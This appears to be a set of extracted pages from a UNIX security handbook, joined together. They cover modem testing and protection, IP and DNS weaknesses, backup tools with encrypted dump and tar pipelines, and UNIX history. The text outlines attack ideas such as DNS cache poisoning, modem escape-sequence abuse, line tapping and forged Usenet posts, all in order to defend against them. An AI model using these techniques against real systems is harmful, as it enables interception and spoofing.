how to use these commands.) Once again, your modem should automatically hang up on the<br />

remote computer.<br />

The above sequence of steps checks out the modem control signals between your computer and your<br />

modem. If things do not work properly, then one of the following may be a problem:<br />

●<br />

●<br />

●<br />

●<br />

The cable connecting your modem and computer may be shorting together several pins, may have<br />

a broken wire, or may be connecting the wrong pins on each connector together.<br />

Your modem may not be properly configured. Many modems have switches or internal registers<br />

that can make the modem ignore some or all of the modem control signals.<br />

You may be using the wrong <strong>UNIX</strong> device. Many versions of <strong>UNIX</strong> have several different devices<br />

in the /dev directory for referring to each physical serial port. Usually one of these devices uses the<br />

modem control signals, while others do not. Check your documentation and make sure you're<br />

using the proper device.<br />

Your software vendor might not have figured out how to make a tty driver that works properly.<br />

Many older versions of DEC's Ultrix had problems with their tty drivers, for example.<br />

Other things to check for dialing out include:<br />

●<br />

●<br />

Make sure there is no way to enter your modem's programming mode by sending an " escape<br />

sequence." An escape sequence is a sequence of characters that lets you reassert control over the<br />

modem and reprogram it. Most <strong>UNIX</strong> modem control programs will disable the modem's escape<br />

sequence, but some do not.[5]<br />

[5] Most modems that use the Hayes "AT" command set, for example, can be forced<br />

into programming mode by allowing a three-second pause; sending three plus signs<br />

(+), the default escape character, in quick succession; and waiting another three<br />

seconds. If your modem prints "OK," then your modem's escape sequence is still<br />

active.<br />

If your modem's escape sequence is not disabled, consult your modem documentation or contact<br />

your modem vendor to determine how to disable the sequence. This step may require you to add<br />

some additional initialization sequence to the modem software, or set some configuration switches.<br />

Verify that your modems lock properly. Be sure that there is no way for one user to make tip or cu<br />

use a modem that is currently in use by another user or by the UUCP system. Likewise, make sure<br />

that UUCP does not use a telephone line that is being used interactively.<br />

Finally, verify that every modem connected to your computer works as indicated above. Both cu and tip<br />

allow you to specify which modem to use with the -l option. Try them all.<br />

If the cu or tip program does not exit when the telephone is disconnected, or if it is possible to return the<br />

modem to programming mode by sending an escape sequence, a user may be able to make telephone<br />

calls that are not logged. A user might even be able to reprogram the modem, causing it to call a specific<br />

phone number automatically, no matter what phone number it was instructed to call. At the other end, a<br />

Trojan horse might be waiting for your users.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_05.htm (4 of 7) [2002-04-12 10:44:49]


[Chapter 14] 14.5 Modems and <strong>UNIX</strong><br />

If the modem does not hang up the phone when cu exits, it can result in abnormally high telephone bills.<br />

Perhaps more importantly, if a modem does not hang up the telephone when the tip or cu program exits,<br />

then your user might remain logged into the remote machine. The next person who uses the tip or cu<br />

program would then have full access to that first user's account on the remote computer.<br />

14.5.3.2 Answer testing<br />

To test your computer's answering ability, you need another computer or terminal with a second modem<br />

to call your computer.<br />

Test as follows:<br />

1.<br />

2.<br />

3.<br />

4.<br />

1.<br />

Call your computer. It should answer the phone on the first few rings and print a login: banner. If<br />

your modem is set to cycle among various baud rates, you may need to press the BREAK or<br />

linefeed key on your terminal a few times to synchronize the answering modem's baud rate with<br />

the one that you are using. You should not press BREAK if you are using a MNP modem that<br />

automatically selects baud rate.<br />

Log in as usual. Type tty to determine for sure which serial line you are using. Then log out. Your<br />

computer should hang up the phone. (Some versions of System V <strong>UNIX</strong> will instead print a<br />

second login: banner. Pressing CTRL-D at this banner may hang up the telephone.)<br />

Call your computer and log in a second time. This time, hang up the telephone by pulling the<br />

telephone line out of the originating modem. This action simulates having the phone connection<br />

accidentally broken. Call your computer back on the same telephone number. You should get a<br />

new login: banner. You should not be reconnected to your old shell; that shell should have had its<br />

process destroyed when the connection was broken. Type tty again to make sure that you got the<br />

same modem. Use the ps command to ensure that your old process was killed. <strong>UNIX</strong> must<br />

automatically log you out when the telephone connection is broken. Otherwise, if the telephone is<br />

accidentally hung up and somebody else calls your computer, that person will be able to type<br />

commands as if he was a legitimate user, without ever having to log in or enter a password.<br />

Verify that every modem connected to your computer behaves in this manner. Call the modem<br />

with a terminal, log in, then unplug the telephone line going into the originating modem to hang up<br />

the phone. Immediately redial the <strong>UNIX</strong> computer's modem and verify that you get a new login:<br />

prompt.<br />

NOTE: Even though <strong>UNIX</strong> should automatically log you out when you hang up the<br />

telephone, do not depend on this feature. Always log out of a remote system before<br />

disconnecting from it.<br />

If you have several modems connected to a hunt group (a pool of modems where the first non-busy<br />

one answers, and all calls are made to a single number), make sure that the group hunts properly.<br />

Many don't - which results in callers getting busy signals even when there are modems available.<br />

14.5.3.3 Privilege testing<br />

Programs such as cu and tip usually must run SUID so that they can manipulate the devices associated<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_05.htm (5 of 7) [2002-04-12 10:44:49]


[Chapter 14] 14.5 Modems and <strong>UNIX</strong><br />

with the modems. However, these programs are specially designed so that if the user attempts a shell<br />

escape, the command runs with the user's UID and not the program's. (Likewise, if the user tries to<br />

redirect data to or from a file, cu and tip are careful not to give the user access to a file to which the user<br />

would normally not otherwise have access.) You should check your versions of cu and tip to make sure<br />

that users are not granted any special privileges when they run these programs.<br />

One way to check to make sure your program is properly configured is to use cu or tip to connect to a<br />

remote machine and then use a shell escape that creates a file in the /tmp directory. Then, look at the file<br />

to see who owns it. For example:<br />

% tip 5557000<br />

connected<br />

login:<br />

~!<br />

[sh]<br />

% touch /tmp/myfile<br />

% ls -l /tmp/myfile<br />

-rw-r--r-- 1 jason 0 Jul 12 12:19 /tmp/myfile<br />

%<br />

The file should be owned by the user who runs the cu or tip program, and not by root or uucp.<br />

Some communications programs, such as kermit, must be installed SUID uucp, and not root. For<br />

example, if you try to run kermit if it is SUID root, you will get the following message:<br />

unix% kermit<br />

Fatal: C-Kermit setuid to root!<br />

unix%<br />

The reason for this behavior is that SUID root programs can be dangerous things, and the authors of<br />

kermit wisely decided that the program was too complex to be entrusted with such privilege. Instead,<br />

kermit should be installed SUID uucp, and with the outbound modems similarly configured. In this<br />

manner, kermit has access to the modems and nothing else.<br />

If you have a third-party communications program that you cannot install SUID uucp, you may wish to<br />

use SGID instead. Simply create a uucp group, set the group of the modem <strong>UNIX</strong> devices to be UUCP<br />

and give the group both read and write access to the modems, and make the third-party program SGID<br />

uucp. And if these measures don't work, complain to your software vendor!<br />

14.5.4 Physical Protection of Modems<br />

Although physical protection is often overlooked, protecting the physical access to your telephone line is<br />

as important as securing the computer to which the telephone line and its modem are connected.<br />

Be sure to follow these guidelines:<br />

●<br />

Protect physical access to your telephone line. Be sure that your telephone line is physically<br />

secure. Lock all junction boxes. Place the telephone line itself in an electrical conduit, pulled<br />

through walls, or at least located in locked areas. An intruder who gains physical access to your<br />

telephone line can attach his or her own modem to the line and intercept your telephone calls<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_05.htm (6 of 7) [2002-04-12 10:44:49]


[Chapter 14] 14.5 Modems and <strong>UNIX</strong><br />

●<br />

●<br />

●<br />

●<br />

before they reach your computer. By spoofing your users, the intruder may learn their login names<br />

and passwords. Instead of intercepting your telephone calls, an intruder might simply monitor<br />

them, making a transcript of all of the information sent in either direction. In this way, the intruder<br />

might learn passwords not only to your system, but to all of the systems to which your users<br />

connect.<br />

Make sure your telephone line does not allow call forwarding. If your telephone can be<br />

programmed for call forwarding, an intruder can effectively transfer all incoming telephone calls<br />

to a number of his choosing. If there is a computer at the new number that has been programmed<br />

to act like your system, your users might be fooled into typing their usernames and passwords.<br />

Consider using a leased line. If all your modem usage is to a single outside location, consider<br />

getting a leased line. A leased line is a dedicated circuit between two points provided by the phone<br />

company. It acts like a dedicated cable, and cannot be used to place or receive calls. As such, it<br />

allows you to keep your connection with the remote site, but it does not allow someone to dial up<br />

your modem and attempt a break-in. Leased lines are more expensive than regular lines in most<br />

places, but the security may outweigh the cost. Leased lines offer another advantage: you can<br />

usually transfer data much faster over leased lines than over standard telephone lines.<br />

Don't get long distance service. If you don't intend to use the telephone for long-distance calls, do<br />

not order long distance service for the telephone lines.<br />

Have your telephone company disable third-party billing. Without third-party billing, people<br />

can't bill their calls to your modem line.<br />

14.4 Modems and <strong>Sec</strong>urity 14.6 Additional <strong>Sec</strong>urity for<br />

Modems<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_05.htm (7 of 7) [2002-04-12 10:44:49]


[Chapter 16] 16.3 IP <strong>Sec</strong>urity<br />

16.3 IP <strong>Sec</strong>urity<br />

Chapter 16<br />

TCP/IP Networks<br />

Throughout the 1980s, computers on the <strong>Internet</strong> were subject to many individual attacks. The solution to these attacks was<br />

relatively simple: encourage users to choose good passwords, prevent users from sharing accounts with each other, and eliminate<br />

security holes in programs such as sendmail and login as holes were discovered.<br />

In the 1990s, the actual infrastructure of the <strong>Internet</strong> has come under attack:<br />

●<br />

●<br />

●<br />

●<br />

Network sniffers have captured passwords and other sensitive pieces of information passing through the network as they are<br />

transmitted.<br />

IP spoofing attacks have been used by attackers to break into hosts on the <strong>Internet</strong>.<br />

Connection hijacking has been used by attackers to seize control of existing interactive sessions (e.g., telnet).<br />

Data spoofing has been used by attackers of a rogue computer on a network to insert data into an ongoing communication<br />

between two other hosts. Data spoofing has been demonstrated as an effective means of compromising the integrity of<br />

programs executed over the network from NFS servers.<br />

Many of these attacks were anticipated more than ten years ago. Yet the IP protocols and the <strong>Internet</strong> itself are not well protected<br />

against them. There are several reasons for this apparent failure:<br />

●<br />

●<br />

●<br />

IP was designed for use in a hostile environment, but its designers did not thoroughly appreciate how hostile the network<br />

itself might one day become.<br />

IP was designed to allow computers to continue communicating after some communications lines had been cut. The concept<br />

is the genesis of packet communications: by using packets, you can route communications around points of failure. But the IP<br />

designers appear to have not anticipated wide-scale covert attacks from legitimate users. As a result, while IP is quite resilient<br />

when subjected to hardware failure, it is less resistant to purposeful attack.<br />

IP was not designed to provide security.<br />

IP was designed to transmit packets from one computer to another. It was not designed to provide a system for authenticating<br />

hosts, or for allowing users to send communications on the network in absolute secrecy. For these purposes, IP's creators<br />

assumed that other techniques would be used.<br />

IP is an evolving protocol.<br />

IP is always improving. Future versions of IP may provide greater degrees of network security. However, IP is still, in many<br />

senses, an experimental protocol. It is being employed for uses for which it was never designed.<br />

16.3.1 Link-level <strong>Sec</strong>urity<br />

IP is designed to get packets from one computer to another computer; the protocol makes no promise as to whether or not other<br />

computers on the same network will be able to intercept and read those packets in real time. Such interception is called<br />

eavesdropping or packet sniffing.<br />

Different ways of transmitting packets have different susceptibility to eavesdropping. The following table lists several different<br />

ways of sending packets and notes the eavesdropping potential.<br />

Table 16.4: Eavesdropping Potential for Different Data Links<br />

Data link Potential for Eavesdropping Comments<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_03.htm (1 of 5) [2002-04-12 10:44:50]


[Chapter 16] 16.3 IP <strong>Sec</strong>urity<br />

Ethernet High Ethernet is a broadcast network. Most incidents of packet sniffing that have<br />

plagued the <strong>Internet</strong> have been the result of packet-sniffing programs running<br />

on a computer that shares an Ethernet with a gateway or router.<br />

FDDI Token-ring High Although ring networks are not inherently broadcast, in practice all packets<br />

that are transmitted on the ring pass through, on average, one-half of the<br />

interfaces that are on the network. High data rates make sniffing somewhat<br />

challenging.<br />

Telephone lines Medium Telephones can be wiretapped by someone who has the cooperation of the<br />

telephone company or who has physical access to telephone lines. Calls that<br />

traverse microwave links can also be intercepted. In practice, high-speed<br />

modems are more difficult to wiretap than low-speed modems because of the<br />

many frequencies involved.<br />

IP over cable TV High Most systems that have been developed for sending IP over cable TV rely on<br />

RF modems which use one TV channel as an uplink and another TV channel<br />

for a downlink. Both packet streams are unencrypted and can be intercepted by<br />

anyone who has physical access to the TV cable.<br />

Microwave and radio High Radio is inherently a broadcast medium. Anyone with a radio receiver can<br />

intercept your transmissions.<br />

The only way to protect against eavesdropping in these networks is by using encryption. There are several methods:<br />

Link-level encryption<br />

With link-level encryption, packets are automatically encrypted when they are transmitted over an unsecure data link and<br />

decrypted when they are received. Eavesdropping is defeated because an eavesdropper does not know how to decrypt packets<br />

that are intercepted. Link-level encryption is available on many radio networking products, but is harder to find for other<br />

broadcast network technologies such as Ethernet or FDDI. Special link encryptors are available for modems and leased-line<br />

links.<br />

End-to-end encryption<br />

With end-to-end encryption, the host transmitting the packet encrypts the packet's data; the packet's contents are<br />

automatically decrypted when they are received at the other end. Some organizations that have more than one physical<br />

location use encrypting routers for connecting to the <strong>Internet</strong>. These routers automatically encrypt packets that are being sent<br />

from one corporate location to the other, to prevent eavesdropping by attackers on the <strong>Internet</strong>; however, the routers do not<br />

encrypt packets that are being sent from the organization to third-party sites on the network.<br />

Application-level encryption<br />

Instead of relying on hardware to encrypt data, encryption can be done at the application layer. For example, the Kerberos<br />

version of the telnet command can automatically encrypt the contents of the telnet data stream in both directions.<br />

These three encryption techniques are shown in Figure 16.8.<br />

Figure 16.8: Three types of encryption for communication<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_03.htm (2 of 5) [2002-04-12 10:44:50]


[Chapter 16] 16.3 IP <strong>Sec</strong>urity<br />

16.3.2 <strong>Sec</strong>urity and Nameservice<br />

DNS was not designed to be a secure protocol. The protocol contains no means by which the information returned by a DNS query<br />

can be verified as correct or incorrect. Thus, if DNS tells you that a particular host has a particular IP address, there is no way that<br />

you can be certain if the information returned is correct.<br />

DNS was designed as an unsecure protocol because IP addresses and hostnames were designed as a system for moving data, and<br />

not as a system for providing authentication.<br />

Unfortunately, hostnames and IP addresses are commonly used for authentication on the <strong>Internet</strong>. The Berkeley <strong>UNIX</strong> r commands<br />

( rsh and rlogin) use the hostname for authentication. Many programs examine the IP address of an incoming TCP connection,<br />

perform a reverse lookup DNS operation, and trust that the resulting hostname is correct. More sophisticated programs perform a<br />

double reverse lookup, in which the network client performs an IP address lookup with the resulting hostname, to see if the<br />

looked-up IP address matches the IP address of the incoming TCP connection.[12]<br />

[12] A double reverse lookup involves looking up the hostname that corresponds to an incoming IP connection, then<br />

doing a lookup on that hostname to verify that it has the same IP address. This process is non-trivial, as <strong>Internet</strong><br />

computers can have more than one IP address, and IP addresses can resolve to more than one <strong>Internet</strong> hostname.<br />

Although the double reverse lookup is designed to detect primitive nameserver attacks, all that it usually detects is sites<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_03.htm (3 of 5) [2002-04-12 10:44:50]


[Chapter 16] 16.3 IP <strong>Sec</strong>urity<br />

that have not properly configured their nameserver files.<br />

An attacker has more trouble spoofing a double reverse lookup, but the possibility still exists. Some of these attacks are:<br />

Client flooding<br />

As DNS uses UDP, an attacker can easily flood the host, making a nameserver request with thousands of invalid responses.<br />

These can be constructed so as to appear to come from the DNS server. The client performing a DNS lookup will most likely<br />

accept the attacker's response, rather than the legitimate response from the authentic nameserver.<br />

Bogus nameserver cache loading<br />

Some nameservers will cache any response that they receive, whether it was requested or not. You can load these<br />

nameservers with incorrect IP address translations as part of a response to some other request.<br />

Rogue DNS servers<br />

The fact that someone runs a nameserver on his or her machine doesn't mean you can trust the results. By appropriately<br />

modifying the responses of a nameserver for one domain to respond to requests with inappropriate information, the<br />

maintainer of a real DNS server can taint the responses to clients.<br />

Firewalls (described in Chapter 21) can provide some (small) degree of protection against a few DNS attacks. Nevertheless, the real<br />

safety relies on not using IP addresses or hostnames for authentication.<br />

16.3.3 Authentication<br />

Most IP services do not provide a strong system for positive authentication. As a result, an attacker (or a prankster) can transmit<br />

information and claim that it comes from another source.<br />

The lack of positive authentication presents problems especially for services such as DNS (see above), electronic mail, and Usenet.<br />

In all of these services, the recipient of a message, be it a machine or a person, is likely to take positive action based on the content<br />

of a message, whether or not the message sender is properly authenticated.<br />

One of the best-known cases of a fraudulently published Usenet message appears below. It was not written by Gene Spafford;<br />

instead, it was created and posted to the Usenet by Chuq von Rospach.<br />

Path:<br />

purdue!umd5!ames!mailrus!umix!uunet!seismo!sundc!pitstop!sun!moscvax!perdue!spaf<br />

From: spaf@cs.purdue.EDU (Gene Spafford)<br />

Newsgroups: news.announce.important<br />

Subject: Warning: April Fools Time again (forged messages on loose)<br />

Message-ID: <br />

Date: 1 Apr 88 00:00:00 GMT<br />

Expires: 1 May 88 00:00:00 GMT<br />

Followup-To: news.admin<br />

Organization: Dept. of Computer Sciences, Purdue Univ.<br />

Lines: 25<br />

Approved: spaf@cs.purdue.EDU<br />

Warning: April 1 is rapidly approaching, and with it comes a USENET<br />

tradition. On April Fools day comes a series of forged, tongue-in-cheek<br />

messages, either from non-existent sites or using the name of a Well<br />

Known USENET person. In general, these messages are harmless and meant<br />

as a joke,and people who respond to these messages without thinking,<br />

either by flaming or otherwise responding, generally end up looking<br />

rather silly when the forgery is exposed.<br />

So, for the next couple of weeks, if you see a message that seems<br />

completely out of line or is otherwise unusual, think twice before<br />

posting a followup or responding to it; it's very likely a forgery.<br />

There are a few ways of checking to see if a message is a forgery.<br />

These aren't foolproof, but since most forgery posters want people to<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_03.htm (4 of 5) [2002-04-12 10:44:50]


[Chapter 16] 16.3 IP <strong>Sec</strong>urity<br />

figure it out, they will allow you to track down the vast majority of<br />

forgeries:<br />

* Russian computers. For historic reasons most forged messages<br />

have as part of their Path: a non-existent (we think!) russian<br />

computer, either kremvax or moscvax. Other possibilities are nsacyber<br />

or wobegon. Please note, however, that walldrug is a real site and<br />

isn't a forgery.<br />

* Posted dates. Almost invariably, the date of the posting is forged<br />

to be April 1.<br />

* Funky Message-ID. Subtle hints are often lodged into the<br />

Message-Id, as that field is more or less an unparsed text string and<br />

can contain random information. Common values include pi, the phone<br />

number of the red phone in the white house, and the name of the<br />

forger's parrot.<br />

* Subtle mispellings. Look for subtle misspellings of the host names<br />

in the Path: field when a message is forged in the name of a Big Name<br />

USENET person. This is done so that the person being forged actually<br />

gets a chance to see the message and wonder when he actually posted it.<br />

Forged messages, of course, are not to be condoned. But they happen,<br />

and it's important for people on the net not to over-react. They happen at this time<br />

every year, and the forger<br />

generally gets their kick from watching the novice users take the<br />

posting seriously and try to flame their tails off. If we can keep a<br />

level head and not react to these postings, they'll taper off rather<br />

quickly and we can return to the normal state of affairs: chaos.<br />

Thanks for your support.<br />

Gene Spafford, Spokeman, The Backbone Cabal.<br />

The April 1 post is funny, because it contains all of the signs of a forged message that it claims to warn the reader about. But other<br />

forged messages are not quite so friendly. Beware!<br />

16.2 IPv4: The <strong>Internet</strong><br />

Protocol Version 4<br />

16.4 Other Network Protocols<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_03.htm (5 of 5) [2002-04-12 10:44:50]


[Chapter 7] 7.4 Software for Backups<br />

Chapter 7<br />

Backups<br />

7.4 Software for Backups<br />

There are a number of software packages that allow you to perform backups. Some are vendor specific,<br />

and others are quite commonly available. Each may have particular benefits in a particular environment.<br />

We'll outline a few of the more common ones here, including a few that you might not otherwise<br />

consider. You should consult your local documentation to see if there are special programs available with<br />

your system.<br />

Beware Backing up Files with Holes<br />

Standard <strong>UNIX</strong> files are direct-access files; in other words, you can specify an offset from the beginning<br />

of the file, and then read and write from that location. If you ever had experience with older mainframe<br />

systems that only allowed files to be accessed sequentially, you know how important random access is<br />

for many things, including building random-access databases.<br />

An interesting case occurs when a program references beyond the "end" of the file and then writes. What<br />

goes into the space between the old end-of-file and the data just now written? Zero-filled bytes would<br />

seem to be appropriate, as there is really nothing there.<br />

Now, consider that the span could be millions of bytes long, and there is really nothing there. If <strong>UNIX</strong><br />

were to allocate disk blocks for all that space, it could possibly exhaust the free space available. Instead,<br />

values are set internal to the inode and file data pointers so that only blocks needed to hold written data<br />

are allocated. The remaining span represents a hole that <strong>UNIX</strong> remembers. Attempts to read any of those<br />

blocks simply return zero values. Attempts to write any location in the hole results in a real disk block<br />

being allocated and written, so everything continues to appear normal. (One way to identify these files is<br />

to compare the size reported by ls -l with the size reported by ls -s.)<br />

Small files with large holes can be a serious concern to backup software, depending on how your<br />

software handles them. Simple copy programs will try to read the file sequentially, and the result is a<br />

stream with lots of zero bytes. When copied into a new file, blocks are actually allocated for the whole<br />

span and lots of space may be wasted. More intelligent programs, like dump, bypass the normal file<br />

system and read the actual inode and set of data pointers. Such programs only save and restore the actual<br />

blocks allocated, thus saving both tape and file storage.<br />

Keep these comments in mind if you try to copy or archive a file that appears to be larger in size than the<br />

disk it resides in. Copying a file with holes to another device can cause you to suddenly run out of disk<br />

space.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_04.htm (1 of 5) [2002-04-12 10:44:50]


7.4.1 Simple Local Copies<br />

The simplest form of backup is to make simple copies of your files and directories. You might make<br />

those copies to local disk, to removable disk, to tape, or to some other media. Some file copy programs<br />

will properly duplicate modification and access times, and copy owner and protection information, if you<br />

are super-user or the files belong to you. They seldom recreate links, however. Examples include:<br />

cp<br />

dd<br />

The standard command for copying individual files. Some versions support a -r option to copy an<br />

entire directory tree.<br />

This command can be used to copy a whole disk partition at one time by specifying the names of<br />

partition device files as arguments. This process should be done with great care if the source<br />

partition is mounted: in such a case, the device should be for the block version of the disk rather<br />

than the character version. Never copy onto a mounted partition - unless you want to destroy the<br />

partition and cause an abrupt system halt!<br />

7.4.2 Simple Archives<br />

There are several programs that are available to make simple archives packed into disk files or onto tape.<br />

These are usually capable of storing all directory information about a file, and restoring much of it if the<br />

correct options are used. Running these programs may result in a change of either (or both) the atime and<br />

the ctime of items archived, however.[8]<br />

ar<br />

tar<br />

[Chapter 7] 7.4 Software for Backups<br />

cpio<br />

pax<br />

[8] See Chapter 5, The <strong>UNIX</strong> Filesystem, for information about these file characteristics.<br />

Simple file archiver. Largely obsolete for backups (although still used for creating <strong>UNIX</strong><br />

libraries).<br />

Simple tape archiver. Can create archives to files, tapes, or elsewhere. This choice seems to be the<br />

most widely used simple archive program.<br />

Another simple archive program. This program can create portable archives in plain ASCII of even<br />

binary files, if invoked with the correct options. (cpio does record empty directories.)<br />

The portable archiver/exchange tool, which is defined in the POSIX standard. This program<br />

combines tar and cpio functionality. This program uses tar as its default file format.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_04.htm (2 of 5) [2002-04-12 10:44:50]


[Chapter 7] 7.4 Software for Backups<br />

7.4.3 Specialized Backup Programs<br />

There are several dedicated backup programs.<br />

dump/restore<br />

This program is the "classic" one for archiving a whole partition at once, and for the associated file<br />

restorations. Many versions of this program exist, but all back up from the raw disk device, thus<br />

bypassing calls that would change any of the times present in inodes for files and directories. This<br />

program can also make the backups quite fast.<br />

backup<br />

Some SVR4 systems have a suite of programs named, collectively, backup. These are also<br />

designed specifically to do backups of files and whole filesystems.<br />

7.4.4 Encrypting Your Backups<br />

You can improvise your own backup encryption if you have an encryption program that can be used as a<br />

filter and you use a backup program that can write to a file, such as the dump, cpio, or tar commands. For<br />

example, to make an encrypted tape archive using the tar command and the des encryption program, you<br />

might use the following command:<br />

# tar cf - dirs and files | des -ef | dd bs=10240 of=/dev/rm8<br />

Although software encryption has potential drawbacks (for example, the software encryption program<br />

can be compromised so it records all passwords), this method is certainly preferable to storing sensitive<br />

information on unencrypted backup.<br />

Here is an example: suppose you have a des encryption program called des which prompts the user for a<br />

key and then encrypts its standard input to standard output.[9] You could use this program with the dump<br />

(called ufsdump under Solaris) program to back up the file system /u to the device /dev/rmt8 with the<br />

command:<br />

[9] Some versions of the des command require that you specify the "-f -" option to make the<br />

program run as a filter.<br />

# dump f - /u | des -e | dd bs=10240 of=/dev/rmt8<br />

Enter key:<br />

If you wanted to back up the filesystem with tar, you would instead use the command:<br />

# tar cf - /u | des -e | dd bs=10240 of=/dev/rmt8<br />

Enter key:<br />

To read these files back, you would use the following command sequences:<br />

# dd bs=10240 if=/dev/rmt8 | des -d | restore fi -<br />

Enter key:<br />

and:<br />

# dd bs=10240 if=/dev/rmt8 | des -d | tar xpBfv -<br />

Enter key:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_04.htm (3 of 5) [2002-04-12 10:44:50]


In both of these examples, the backup programs are instructed to send the backup of file systems to<br />

standard output. The output is then encrypted and written to the tape drive.<br />

NOTE: If you encrypt the backup of a filesystem and you forget the encryption key, the<br />

information stored on the backup will be unusable.<br />

7.4.5 Backups Across the Net<br />

A few programs can be used to do backups across a network link. Thus, you can do backups on one<br />

machine, and write the results to another. An obvious example would be using a program that can write<br />

to stdout, and then piping the output to a remote shell. Some programs are better integrated with<br />

networks, however.<br />

rdump/rrestore<br />

rcp<br />

ftp<br />

[Chapter 7] 7.4 Software for Backups<br />

rdist<br />

This is a network version of the dump and restore commands. It uses a dedicated process on a<br />

machine that has a tape drive, and sends the data to that process. Thus, it allows a tape drive to be<br />

shared by a whole network of machines.<br />

This command enables you to copy a file or a whole directory tree to a remote machine.<br />

Although the venerable ftp command can be used to copy files, it is slow and cumbersome to use<br />

for many files, and it does not work well with directories. In addition, the standard ftp does not<br />

understand <strong>UNIX</strong> device files, sockets,[10] symbolic links, or other items that one might wish to<br />

backup.<br />

[10] Why back up sockets? Because some programs depend upon them.<br />

This program is often used to keep multiple machines in synchronization by copying files from a<br />

master machine to a set of slaves. However, the program primarily works by copying only files<br />

that have changed from a master set, and can therefore update a backup set of files from a working<br />

version. Thus, instead of distributing new files, the program archives them. rdist can also be run in<br />

a mode to simply print the names of files that differ between an old set and a destination machine.<br />

7.4.6 Commercial Offerings<br />

There are several commercial backup and restore utilities. Several of them feature special options that<br />

make indexing files or staging little-used files to slower storage (such as write-once optical media) easier.<br />

Unfortunately, lack of portability across multiple platforms, and compatibility with sites that may not<br />

have the software installed, might be drawbacks for many users. Be sure to fully evaluate the conditions<br />

under which you'll need to use the program and decide on a backup strategy before purchasing the<br />

software.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_04.htm (4 of 5) [2002-04-12 10:44:50]


[Chapter 7] 7.4 Software for Backups<br />

7.4.7 inode Modification Times<br />

Most backup programs check the access and modification times on files and directories to determine<br />

which entries need to be stored to the archive. Thus, you can force an entry to be included (or not<br />

included) by altering these times. The touch command enables you to do so quickly and efficiently.<br />

However, many programs that do backups will cause the access time on files and directories to be<br />

updated when they are read for the backup. As this behavior might break other software that depends on<br />

the access times, these programs sometimes use the utime system call to reset the access time back to the<br />

value it had prior to the backup.<br />

Unfortunately, using the ctime () system call will cause the inode change time, the ctime, to be altered.<br />

There is no filesystem call to set the ctime back to what it was, so the ctime remains altered. This is a<br />

bane to system security investigations, because it wipes out an important piece of information about files<br />

that may have been altered by an intruder.<br />

For this reason, we suggest that you determine the behavior in this regard by any candidate backup<br />

program and choose one that does not alter file times. When considering a commercial backup system (or<br />

when designing your own), it is wise to avoid a system that changes the ctime or atime stored in the<br />

inode.<br />

If you cannot use a backup system that directly accesses the raw disk partitions, you have two other<br />

choices:<br />

1.<br />

2.<br />

You can unmount your disks and remount them read-only before backing them up. This procedure<br />

will allow you to use programs such as cpio or tar without changing the atime.<br />

If your system supports NFS loopback mounts (such as Solaris or SunOS), you can create a<br />

read-only NFS loopback mount for each disk. Then you can back up the NFS-mounted disk, rather<br />

than the real device.<br />

7.3 Backing Up System Files 8. Defending Your Accounts<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_04.htm (5 of 5) [2002-04-12 10:44:50]


[Chapter 1] 1.3 History of <strong>UNIX</strong><br />

1.3 History of <strong>UNIX</strong><br />

Chapter 1<br />

Introduction<br />

The roots of <strong>UNIX</strong>[4] go back to the mid-1960s, when American Telephone and Telegraph, Honeywell,<br />

General Electric, and the Massachusetts Institute of Technology embarked on a massive project to<br />

develop an information utility. The project, called MULTICS (standing for Multiplexed Information and<br />

Computing Service), was heavily funded by the Department of Defense Advanced Research Projects<br />

Agency (ARPA, once also known as DARPA). Most of the research took place in Cambridge,<br />

Massachusetts, at MIT.<br />

[4] A more comprehensive history of <strong>UNIX</strong>, from which some of the following is derived, is<br />

Peter Salus's book, A Quarter Century of <strong>UNIX</strong>, mentioned in Appendix D.<br />

MULTICS was a modular system built from banks of high-speed processors, memory, and<br />

communications equipment. By design, parts of the computer could be shut down for service without<br />

affecting other parts or the users. The goal was to provide computer service 24 hours a day, 365 days a<br />

year - a computer that could be made faster by adding more parts, much in the same way that a power<br />

plant can be made bigger by adding more furnaces, boilers, and turbines. Although this level of<br />

processing is simply assumed today, such a capability was not available when MULTICS was begun.<br />

MULTICS was also designed with military security in mind. MULTICS was designed both to be<br />

resistant to external attacks and to protect the users on the system from each other. MULTICS was to<br />

support the concept of multilevel security. Top <strong>Sec</strong>ret, <strong>Sec</strong>ret, Confidential, and Unclassified information<br />

could all coexist on the same computer. The MULTICS operating system was designed to prevent<br />

information that had been classified at one level from finding its way into the hands of someone who had<br />

not been cleared to see that information. MULTICS eventually provided a level of security and service<br />

that is still unequaled by many of today's computer systems - including, perhaps, <strong>UNIX</strong>.<br />

In 1969, MULTICS was far behind schedule. Its creators had promised far more than they could deliver<br />

within the projected time frame. Already at a disadvantage because of the distance between its New<br />

Jersey laboratories and MIT, AT&T decided to pull out of the MULTICS Project.<br />

That year Ken Thompson, an AT&T researcher who had worked on the MULTICS Project, took over an<br />

